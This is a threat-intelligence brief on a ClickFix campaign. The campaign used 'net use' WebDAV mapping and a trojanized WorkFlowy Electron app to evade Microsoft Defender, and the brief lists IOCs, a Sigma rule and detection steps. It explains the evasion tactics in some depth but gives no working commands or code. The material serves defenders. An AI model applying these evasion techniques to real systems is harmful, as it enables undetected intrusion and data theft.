Atos researchers documented a ClickFix variant that ditches PowerShell and MSHTA in favor of ‘net use’ WebDAV drive mapping and a trojanized Electron application with a malicious ASAR archive — techniques that successfully evaded Microsoft Defender for Endpoint. The campaign was only surfaced through targeted threat hunting on RunMRU registry telemetry, not automated detection controls. A deployable Sigma rule exists for this TTP cluster, making immediate detection engineering action possible despite gaps in delivery mechanism and final payload visibility.
This ClickFix variant represents a deliberate architectural shift in evasion strategy. Rather than relying on interpreter-based execution chains that EDR tools actively monitor, the attackers open with ‘net use’ to mount a remote WebDAV share at 94.156.170[.]255 as a local drive letter, execute a hosted batch file through standard filesystem calls, then immediately unmap the drive. Because ‘net use’ is a native Windows networking utility and WebDAV traffic blends with HTTPS, this initial stage generates minimal telemetry compared to direct PowerShell or MSHTA invocation. PowerShell enters the chain only in a second stage — after the highest-scrutiny execution window has passed. This sequencing shows the threat actors understand EDR detection timing and have tuned their chain accordingly.
The second evasion layer exploits application trust at the Electron runtime level. The payload is a repackaged WorkFlowy desktop client (v1.4.1050, signed by FunRoutine Inc.) with its legitimate resources/app.asar replaced by a trojanized version (SHA256: a390fe045f50a0697b14160132dfa124c7f92d85c18fba07df351c2fcfc11063) containing a malicious main.js. Electron applications execute ASAR-bundled JavaScript in the Node.js main process, outside the Chromium sandbox, with full user-level privileges. Most endpoint security tools treat ASAR files as opaque application assets rather than executable code, creating a blind spot that this campaign exploits directly. The injected code runs as an immediately-invoked function expression (IIFE) that blocks all legitimate WorkFlowy initialization — meaning a non-functional application is itself a behavioral indicator teams can act on.
The C2 infrastructure is lightweight and specific. The malicious main.js beacons to cloudflare[.]report (resolving to 144.31.165[.]173, AS215439, Frankfurt) via HTTP POST every two seconds, transmitting victim ID, machine name, and username. The domain was registered in January 2026 through OnlineNIC with a Hong Kong registrant. Persistence across sessions relies on an 8-character alphanumeric ID written to %APPDATA%\id.txt — there is no OS-level persistence mechanism in the dropper itself. The beacon operates only while the trojanized WorkFlowy process is running, with full follow-on payload delivery presumably delegated to the C2. Because the C2 was unresponsive at analysis time, the final payload was not observed. This is a meaningful gap: any host that executed this chain before C2 shutdown cannot be assessed for secondary payload delivery without forensic review.
Detection coverage for this campaign is currently limited to threat hunting. Microsoft Defender for Endpoint produced no alerts on any part of the execution chain, confirmed by Atos. The only signal that surfaced the activity was suspicious command strings written to the Explorer RunMRU registry key (HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\RunMRU) — the record of commands entered via the Win+R Run dialog. A Sigma rule (id: 20891a30-032e-4f15-a282-fa4a8b0d8aae) targeting this pattern is available and deployable directly against Sysmon Event ID 13 or equivalent EDR registry telemetry. This is currently the highest-confidence detection path for this TTP cluster.
Two gaps limit the full picture. First, the initial delivery mechanism driving users to the phishing page at happyglamper[.]ro — which poses as a CAPTCHA — is undocumented. Whether the vector is malvertising, a phishing email, or a redirect chain is unknown, which constrains upstream prevention options. Second, the unresponsive C2 means full impact scope for any successful pre-shutdown infections cannot be determined from existing reporting. Teams should prioritize the Sigma rule deployment and ASAR integrity checks as immediate actions, while treating confirmed execution of any part of this chain as a full incident requiring forensic investigation rather than IOC-only remediation.
- Takeaway 1: Deploy Sigma rule id 20891a30-032e-4f15-a282-fa4a8b0d8aae against RunMRU registry telemetry (Sysmon Event ID 13) immediately — this was the only control that detected the campaign and targets ‘net.exe’ and LOLBin invocations via the Win+R Run dialog.
- Takeaway 2: Alert on or block ‘net use’ commands mapping drives to external HTTPS or WebDAV endpoints from non-administrative user contexts — this TTP bypassed PowerShell and MSHTA monitoring controls while leaving a distinct registry signal.
- Takeaway 3: Add ASAR archive integrity verification to endpoint security workflows — validate app.asar files against known-good hashes for installed Electron applications; the malicious archive SHA256 is a390fe045f50a0697b14160132dfa124c7f92d85c18fba07df351c2fcfc11063.
- Takeaway 4: Block or monitor outbound connections to cloudflare[.]report and 144.31.165[.]173; flag creation of %APPDATA%\id.txt by WorkFlowy.exe as a high-confidence behavioral IOC.
- Takeaway 5: Any confirmed execution of this chain before C2 shutdown must be treated as a full incident requiring forensic review — the absence of OS-level persistence in the dropper does not rule out secondary payload delivery via C2 contact.
